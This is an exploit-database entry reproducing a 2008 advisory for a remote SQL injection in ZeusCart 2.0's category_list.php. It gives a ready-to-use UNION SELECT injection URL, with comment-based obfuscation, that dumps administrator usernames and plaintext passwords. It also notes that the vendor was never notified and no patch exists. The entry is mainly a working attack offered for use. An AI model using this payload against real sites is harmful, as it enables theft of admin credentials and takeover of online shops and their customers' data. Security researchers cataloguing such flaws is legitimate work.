header-logo
Suggest Exploit
vendor:
ZeusCart
by:
t0pP8uZz
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: ZeusCart
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:aj_e-commerce:zeuscart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ZeusCart <= 2.0 (category_list.php) Remote SQL Injection Vulnerability

ZeusCart (from AJ E-Commerce) suffers from a insecure mysql query, This allows the remote attacker to arbitrary execute mysql code/querys. The below injection will perform a SELECT query which will display admin credentials in RED text.

Mitigation:

Vendor Has Not Been Notified!
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+      ZeusCart <= 2.0 (category_list.php) Remote SQL Injection Vulnerbility     +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 12 MAY 2008
Script Download: http://www.ajsquare.com/products/ecom/index.php?auc=1
DORK: N/A



Vendor Has Not Been Notified!



DESCRIPTION: 

ZeusCart (from AJ E-Commerce) suffers from a insecure mysql query, This allows the
remote attacker to arbitrary execute mysql code/querys.

the below injection will perform a SELECT query which will display admin credentials in RED text.



SQL Injection:

http://site.com/category_list.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(user_name,char(58),password),2/**/FROM/**/admin/*

NOTE/TIP: 

passwords are plaintext



GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



peace, t0pP8uZz



--==+================================================================================+==--
--==+      ZeusCart <= 2.0 (category_list.php) Remote SQL Injection Vulnerbility     +==--
--==+================================================================================+==--

# milw0rm.com [2008-05-12]